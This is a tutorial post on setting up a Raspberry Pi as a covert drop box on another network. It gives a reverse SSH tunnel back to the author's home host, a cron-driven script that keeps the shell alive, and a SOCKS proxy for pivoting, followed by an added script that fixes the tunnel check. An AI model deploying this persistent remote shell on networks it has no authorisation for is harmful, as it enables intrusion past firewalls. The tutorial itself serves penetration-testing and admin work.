SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)
In this section I'll cover setting up a Raspberry Pi to send you a reverse shell over SSH (AKA "shoveling a shell"). This is pretty good for getting past NAT and firewalls with weak egress filtering: the Pi makes an ordinary outbound SSH connection to you, and you ride back in over it. The idea is that you can use these as drop boxes to leave behind on someone else's network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, though most distros I've seen include it.

On the Raspberry Pi, open the reverse tunnel. This makes port 1974 on the home PC forward to port 22 (sshd) on the Pi; by default the listener is bound only to the home PC's loopback interface:
ssh -R 1974:localhost:22 root@home.irongeek.com
Then, on the home PC, connect through that listener to the Pi's SSH server (pi is the user on the Raspberry Pi):
ssh -D 1080 -p 1974 pi@localhost
The -D option in the second command also opens a SOCKS proxy on port 1080 of your local PC that you can use to tunnel traffic into the Raspberry Pi's network.
Automating it
OK, the commands above were just for doing it manually; how about automating the shell shoveling? I based my work on Brandon Hutchinson's script for re-establishing the SSH reverse connection every 5 minutes, so check out his site:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html
Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace "root" with the username on your home PC (I use home.irongeek.com in these examples). Keep in mind that the key has to have a blank passphrase so cron can use it, which means anyone who picks up the drop box gets whatever that key can log in to. Use a dedicated, unprivileged account on the home PC rather than root, and consider prefixing the key's line in authorized_keys with options such as restrict,port-forwarding,permitlisten="1974" (OpenSSH 7.8 or later) so the key can open that one reverse forward but not a pty or any other forwards.
ssh-keygen -t rsa
Use a blank passphrase. This next line copies the public key to the PC (the ssh-copy-id utility that ships with OpenSSH does the same thing):
cat ~/.ssh/id_rsa.pub | ssh root@home.irongeek.com "cat - >> ~/.ssh/authorized_keys"
2. Reverse SSH Automatic Script
Make a script called "autossh" on the Raspberry Pi with the contents below, changing REMOTE_HOST, USER_NAME and REMOTE_PORT as needed:
#!/bin/sh
# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html
# $REMOTE_HOST is the name of the remote system (your home PC)
REMOTE_HOST=home.irongeek.com
# $USER_NAME is the account on the home PC that holds the Pi's public key;
# you will most likely want to change this
USER_NAME=root
# $REMOTE_PORT is the port on the home PC that will be forwarded
# back to port 22 on this system
REMOTE_PORT=1974
# $COMMAND is the command used to create the reverse ssh tunnel.
# ExitOnForwardFailure makes ssh quit instead of sitting there connected
# with no listener if $REMOTE_PORT is still in use on the home PC, and the
# ServerAlive options make a dead connection time out in about 90 seconds
# instead of hanging forever behind a stateful firewall.
COMMAND="ssh -q -N -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 -R $REMOTE_PORT:localhost:22 $USER_NAME@$REMOTE_HOST"
# Is the tunnel up? Perform two tests:
# 1. Check for relevant process ($COMMAND). Note that ssh -N runs in the
#    foreground, so this script blocks here while the tunnel is up; the
#    cron runs that follow find the process and just re-check the listener.
pgrep -f -x "$COMMAND" > /dev/null 2>&1 || $COMMAND
# 2. Test tunnel by looking at "netstat" output on $REMOTE_HOST. Log in as
#    $USER_NAME, not the Pi's local user (netstat may be missing on newer
#    systems; ss -ltn shows the same information).
ssh $USER_NAME@$REMOTE_HOST netstat -an | egrep "tcp.*:$REMOTE_PORT.*LISTEN" \
> /dev/null 2>&1
if [ $? -ne 0 ] ; then
    pkill -f -x "$COMMAND"
    $COMMAND
fi
and set it as executable with:
chmod 755 autossh
3. Use the "crontab -e" command on your Raspberry Pi to schedule the script to run every 5 minutes. The entry will be something like:
*/5 * * * * /home/pi/autossh
4. Now go to your home PC and you should be able to use this command to connect to the waiting shell (pi is the user on the Raspberry Pi; the reverse port is bound on your home PC's loopback, hence localhost):
ssh -D 1080 -p 1974 pi@localhost
Use port 1080 on localhost for tools that work with a SOCKS proxy (for example curl's --socks5-hostname option, or proxychains) to tunnel traffic into the remote network. The "hostname" variant of curl's option also makes DNS lookups happen on the Pi's side of the tunnel, so internal names resolve.
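One thing worth checking in the autossh script's second test: egrep "tcp.*:$REMOTE_PORT.*LISTEN" has no anchor after the port, so a listener on 19740 satisfies it when the real tunnel on 1974 is gone, and it also assumes netstat's column order, so it never matches ss -ltn output and would restart a healthy tunnel every run. The script below is an added example, not code from the original post or from Brandon Hutchinson's script. It compares the original pattern with a stricter one that requires the port to be a whole field on a LISTEN line. The listener tables are constructed sample text so it runs offline; in the real script you would feed it the output of ssh $USER_NAME@$REMOTE_HOST netstat -an (or ss -ltn) instead.

```shell
#!/bin/sh
# Added example (not part of the original post): a stricter "is the
# reverse tunnel up?" test than egrep "tcp.*:$REMOTE_PORT.*LISTEN".
# Both functions take the port as $1 and the listener table as text in $2.

# The check used in the autossh script: no anchor after the port, and it
# assumes netstat's "tcp ... LISTEN" column order.
naive_listening() {
    printf '%s\n' "$2" | grep -Eq "tcp.*:$1.*LISTEN"
}

# Strict version: the line must carry LISTEN, and the port must be a whole
# field (preceded by ':' and followed by whitespace or end of line).
# Works on netstat -an and ss -ltn output, IPv4 or IPv6 (::1:1974).
tunnel_listening() {
    printf '%s\n' "$2" | grep LISTEN | grep -Eq ":$1"'([[:space:]]|$)'
}

# Constructed sample output for the demo (assumed, not captured).
# Healthy tunnel: the reverse forward is bound on the home PC's loopback.
NETSTAT_UP='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:1974          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN'

# Tunnel is gone: only a stale ESTABLISHED socket on 1974 and an unrelated
# listener on 19740 remain. The naive pattern still matches because of 19740.
NETSTAT_DOWN='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:19740         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:1974          127.0.0.1:51234         ESTABLISHED'

# ss -ltn puts State first and has no "tcp" text, so the naive pattern never
# matches it and the script would kill and restart a working tunnel.
SS_UP='State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     127.0.0.1:1974       0.0.0.0:*'

report() {
    if tunnel_listening 1974 "$2"; then
        echo "$1: 1974 is listening, leave the tunnel alone"
    else
        echo "$1: no listener on 1974, restart the tunnel"
    fi
}

report "netstat, tunnel up"   "$NETSTAT_UP"
report "netstat, tunnel down" "$NETSTAT_DOWN"
report "ss, tunnel up"        "$SS_UP"
```

To use it in the autossh script, replace the egrep pipeline with tunnel_listening "$REMOTE_PORT" "$(ssh $USER_NAME@$REMOTE_HOST netstat -an)" and restart the tunnel when it returns non-zero.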